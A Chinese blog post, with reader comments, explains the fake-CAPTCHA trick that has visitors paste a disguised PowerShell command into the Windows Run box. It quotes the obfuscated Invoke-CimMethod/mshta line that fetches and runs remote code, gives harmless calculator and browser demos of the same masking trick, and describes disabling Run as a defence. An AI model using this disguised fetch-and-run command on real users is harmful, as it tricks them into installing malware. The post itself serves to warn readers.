昨天晚上刷微博的时候,看到教主发的《现在黑产有一种新的社交工程学挂马方案》 ,虽然技术不高深,但是迷惑性还是蛮大的。也是因为看不懂教主发的微博,让我时常自惭形秽。
看描述,应该是在访问一些网站的时候会弹出人机验证的界面,根据截图看来应该是国外的网站,国内网站未为可知,或者也有。当然,这种网站基本都不可能是什么正规网站,即使现在中文网站没用这些技术,可能过几天也就出了中文版本了。
基于这种验证,在弹出这个窗口的时候页面已经将要粘贴到文本内容写入了粘贴板,此时你按照页面提示,按下键盘的 Win +R 键,此时会弹出运行窗口,然后,你再按 Ctrl +v 粘贴验证文本,此时运行窗口就变成了下面的样子:
真的不同的 windows 版本(系统设置)可能前面的选择框样式有所区别,但是看起来似乎没什么问题对不对?
此时你要执行第三步了,按键盘的 Enter 或者点击确定。点了之后,一个黑窗口出来又消失了,似乎没什么变化,然而,就在这时候,你已经下载了黑客的木马文件并且执行了,而这个操作,火绒似乎也不会有什么反应。
那么问题出在什么地方呢?当然是你复制到运行窗口内的那段文字,实际上全部内容应该是类似下面的样子:
然而,这段经过精心设计的问题,在粘贴到运行窗口之后。由于运行窗口默认显示机制是显示最后的文本,那么刚好就显示了想让你看到的那一段:
✅ 'I am not a robot: CAPTCHA Verification UID: 1314
让你自以为是在做验证,然而,这一句是注释,真正有用的是前面的这一段:
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}
通过 mshta.exe 加文件路径反问文件并且执行。那么知道怎么实现的,我稍微改造了一下,不会产生任何的危害,也可以测试下效果。
例如复制下面这段,运行之后会打开计算器:
powershell -w 1 -C "$l='https://oba.by/';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('cal' + 'c' + '.exe ')}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 1314'
运行效果:
下面这行命令会在运行之后直接打开我的博客:
powershell -w 1 -C "$l='https://oba.by/';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('C:\Program Files\Internet Explorer\iexplor' + 'e' + '.exe https://oba.by')}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 1314'
运行效果:
要解决这个问题,最简单的是不要在脱离当前程序运行任何命令,当然,也可以按照教主的做法,直接禁用运行:
Win+R,输入 gpedit.msc 运行。然后打开[用户配置] -> [管理模板] -> [“开始”菜单和任务栏],找到[从“开始”菜单中删除“运行”菜单],双击打开,选择“已启用”。
设置之后再次按 win +R 就会出现下面的提示:
如果要恢复功能,在开始菜单直接搜索gpedit.msc,点击运行之后将选项改为未配置或者已禁用即可。
简而言之,上网要小心,眼见不一定为真,不然,哪里有那么多的美女呢!祝大家情人节快乐啊!
64 comments
这种我还没见过,人机验证倒是挺常见,看来是我访问的网站还不够多。
提前通知一下,小心中招。嘻嘻
天哪,现在的人机校验都这么高级了,不过只能骗小白,有经验的会疑问输入验证码为什么要打开win + R,没必要啊,而且是这是执行程序,就马上起戒备心了,就不搞了,哈哈哈
这个要是小白,的确容易中招啊
灵妹妹,那件衣服勒不勒?
还行啊
禁用运行可还行……怎么不干脆把PowerShell给一起禁了。
当然也行,更彻底啊。多数人也不会用 ps。
更直接换 mac 或者 linux 也可以的啦。
验证是否robot还要让人配合按键,明目张胆的叫人win+R,懂一些电脑的应该会提防着。
这个一般是,先放一些足够吸引人的内容题目,然后让你反复验证失败(比如谷歌红绿灯)当你反复失败到暴躁时,再告诉你可能是因为你的浏览器版本问题,请用另一种不需要浏览器的验证方式,再说手动操作配合按键,说的充斥一些专业术语让人云里雾里的,只是懂一些的就会信任它了。
的确,网站内容只要有足够的吸引力就有人愿意铤而走险。
然而,现在的年轻人都是手机重度用户,至于电脑?多数人都不咋懂。
你可以永远相信火绒。。我试了下 直接给拦截了
说实话,我不大相信,哈哈哈。
看来是更新策略了?
https://ihaihe.cn/wp-content/uploads/2025/02/48e5dfcdfaf76434d36665b15314e878.webp
你看你看 给拦截了。。。火绒好评
下载了个火绒看了下,病毒库最后更新是昨天下午。应该是更新规则了
不少验证都是鼠标点一下就行。
用到键盘的以后得小心谨慎了。
这个设计确实不错。
不过这种验证复杂,不发钱,我估计懒得操作。
是的,搞这个玩意儿的,的确有创意
现在ai这么发达,人机对抗训练越来越复杂,以后说不定还真得用键盘
打着人机验证的旗号搞事情,确实有些迷惑性。
不得不说,这个创意的确不错
啊 最近的电脑病毒好像技术含量越来越低了
越简单粗暴,效果可能越好。
厉害了,你怎么啥都知道,啥都能遇到。。。
这个纯好奇而已
Hids 改用还是用,火绒没反应可能是没有执行动作,也可能是用了白加黑bypass
https://trustsing.com/idefender/
Linux主系统,不怕病毒,也找不到杀毒软件~
这玩意儿支持linux
https://www.clamav.net/downloads
奇怪的知识又增加了。。
IT7网络,位置识别这么精准吗……
所以是识别对了?
用的纯真的数据库。
相当准确,这是我的瓦工梯子。
酱紫,自建梯子吗?
看看是越南吗?
是滴~
用的是我修改的 wp useragent,需要的话可以自取。
https://h4ck.org.cn/2024/11/18473
改成插件了吗?看了下还不错,就是要拖着个composer的大尾巴(vendor目录),先down下来备用。感谢分享~
不用,插件都继承了,在插件目录内,无需composer 导入。
这……我觉得会点电脑的,不能上这个当吧。
毕竟还是小白多啊
然鹅 我命令都是powershell执行的 前面都看得见
然鹅 不是所有人都跟你一样聪明啊
现在不乱下载软件的话,遇到病毒的几率不多见了
不上各种下载网站,涩涩网站就会降低很大概率
嘶,可能我看起来很简单,但是如果换成中文,家里人可能还真会中招嘞
类似这种的,早晚会出现的
在 B 站看视频,正好看到你发的视频,就到了这里。
真正的 CAPTCHA 验证是让你选图片,而不是输入打开运行,输入代码。
然鹅 并不是每个人都懂这个
人机验证=反人类验证
的确
https://h4ck.org.cn/microposts/x%e7%9a%84%e5%82%bb%e9%80%bc%e9%aa%8c%e8%af%81%e7%a0%81%ef%bc%8c%e7%9c%9f%e6%98%af-tmd-%e6%9c%8d%e4%ba%86%e3%80%82%e8%bf%98%e5%be%97%e8%bf%9e%e7%bb%ad%e5%af%b9-10-%e4%b8%aa%e3%80%82%e5%b7%a6%e4%be%a7
弱弱的问个问题,你的昵称里的那个cdm是那个cdm的意思吗?🤫
你说的cdm是什么意思,受还是,性取向?受的话确实有点但是没那么夸张,算是心理问题的附赠品。。
但是我不喜欢穿着异性的衣服来表达自己,不会做一些奇怪的事情或者是不符合正常人的行为。
心理性别的认同感吧,毕竟现在这些东西也比较小众。
看不到摸不着用不到的东西不会去接触的 除非真的非常需要 或者感兴趣 总而言之 小心为好
世道艰险啊,这些手段真是层出不穷、防不胜防
是的呢 上网得小心
人生苦短,我要mac。
买买买
前几天整了这个人机验证 我还说现在的人机验证这么高级了 结果今天凌晨steam就被盗刷了
啊,这是受害人现身说法吗?宝子上网注意安全哦。
以后多来姐姐的博客看看,😁
看到要按Win+R的操作就得警惕了,验证码哪需要调用系统命令啊…
嗯嗯,但是,还会有人上当啊,
评论区已经出现受害者了。
防不胜防,一般人还真容易中招(不过说起这个recaptcha本身就是一个收集用户习惯的东东早脱里真人验证了
是的,尤其是对于不那么专业的人来说